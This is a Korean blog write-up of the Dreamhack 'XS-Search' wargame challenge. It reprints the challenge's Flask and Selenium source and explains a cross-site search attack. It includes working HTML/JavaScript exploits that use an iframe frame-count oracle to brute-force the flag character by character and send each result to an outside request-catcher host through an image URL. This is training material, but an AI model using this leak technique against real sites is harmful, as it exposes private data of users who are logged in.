[Dreamhack] XS-Search

Webhacking-Write-Up/Dreamhack

[Dreamhack] XS-Search

SlowTurtle_ 2023. 1. 10. 17:21

728x90

[Dreamhack] XS-Search

우선 코드를 보자.

#!/usr/bin/python3
from flask import Flask, request, render_template, make_response, redirect, url_for
from selenium.common.exceptions import TimeoutException
from urllib.parse import urlparse
from selenium import webdriver
from hashlib import md5
import urllib
import os

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open("./flag.txt", "r").read()
except:
    FLAG = "[**FLAG**]"

notes = {
    (FLAG, True), 
    ("Hello World", False), 
    ("DreamHack", False), 
    ("carpe diem, quam minimum credula postero", False)
}

def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome("/chromedriver", options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get(url)
    except TimeoutException as e:
        driver.quit()
        return True
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True


@app.route("/")
def index():
    return render_template('index.html')


@app.route('/search')
def search():
    query = request.args.get('query', None)
    if query == None:
        return render_template("search.html", query=None, result=None)
    for note, private in notes:
        if private == True and request.remote_addr != "127.0.0.1" and request.headers.get("HOST") != "127.0.0.1:8000":
            continue
        if query != "" and query in note:
            return render_template("search.html", query=query, result=note)
    return render_template("search.html", query=query, result=None)


@app.route("/submit", methods=["GET", "POST"])
def submit():
    if request.method == "GET":
        return render_template("submit.html")
    elif request.method == "POST":
        url = request.form.get("url", "")
        if not urlparse(url).scheme.startswith("http"):
            return '<script>alert("wrong url");history.go(-1);</script>'
        if not read_url(url):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'


app.run(host="0.0.0.0", port=8000)

/search를 보면 GET파라미터로 query를 받아오고 쿼리값을 전역변수 notes에 있는지 검사한다. query가 없다면 다시 search.html페이지로 돌아온다. 또한 private == True이고 요청한 패킷이 로컬호스트가 아니며 요청한 패킷 헤더 HOST가 로컬 서버(127.0.0.1:8000)가 아니라면 continue한다. /search페이지는 검색 결과로 iframe 개수의 변화를 알 수 있다.

/submit을 보면 GET으로 URL을 입력받고 POST로 url파라미터 값이 http 또는 https의 scheme를 갖고있는지 확인 후 read_url함수를 통해서 방문이 가능하다.

아래 코드는 localhost에서 notes에 DH를 포함하고있는지 확인할 수 있는 코드다. html로 하여 서버에 올려서 외부에서 접속가능한 형태로 만든 후 확인해보자.(flag는 로컬호스트에서만 접근가능)

<iframe id="iframe"></iframe>
<img id="img">
<script>
const iframe = document.getElementById("iframe");
iframe.src = "http://localhost:8000/search?query=DH{";
iframe.onload = () => {
    img.src = `https://xfdztmn.request.dreamhack.games/${iframe.contentWindow.frames.length}`;
};
</script>

웹서버에 올린 후 /submit페이지에 입력하여 제출하면 1이 뜨는 것을 확인할 수 있다. 이것은 notes에 DH가 있다는 뜻으로 해석할 수 있다. 이제 flag를 획득하기위하여 exploit코드를 작성하자. (코드는 비동기로 작성해야 이전 요청이 취소되지 않는다.)

<iframe id="iframe"></iframe>
<img id="img">
<script>
    async function req(url) {
        return await new Promise((resolve, reject) => {
            const iframe = document.getElementById("iframe");
            iframe.src = url;
            iframe.onload = () => { 
                if (iframe.contentWindow.frames.length != 0)
                    return resolve();
                else
                    return reject();
            };
        });
    }
    async function search(query) {
        try {
            await req(
              `http://localhost:8000/search?query=${query}`
            );
            return true;
        } catch (e) {
            return false;
        }
    }
    async function exploit() {
        let chars = "0123456789abcdef}"
        let secret = "DH{";
        while (!secret.includes("}")) {
            for (let c of chars) {
                if (await search(secret + c)) {
                    secret += c;
                    img.src = `https://xfdztmm.request.dreamhack.games/${secret}`;
                    break;
                }
            }
        }
    }
    exploit();
</script>

DH{ 부분을 얻은 플래그값으로 계속 이어서 변경한 후 다시 서버에 올리며 제출하면 마지막에 }까지 주어진다.

flag를 획득할 수 있었다.

728x90

'Webhacking-Write-Up > Dreamhack' 카테고리의 다른 글

[Dreamhack] blind sql injection advanced (0)	2023.01.10
[Dreamhack] DOM XSS (0)	2023.01.10
[Dreamhack] Relative Path Overwrite Advanced (0)	2023.01.10
[Dreamhack] Relative Path Overwrite (0)	2023.01.10
[Dreamhack] CSS Injection (0)	2023.01.10

현재글[Dreamhack] XS-Search

IT/보안

DVWA, 빡공팟5기, webhacking.kr, AWS, webhacking, webgoat, dreamhack, CSRF, wargame, OWASP, 드림핵, SQL Injection, OWASP WebGoat, 빡공팟, XSS, EC2, 파이썬, los, TeamH4C, P4C,

Today :
Yesterday :

일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

SlowTurtle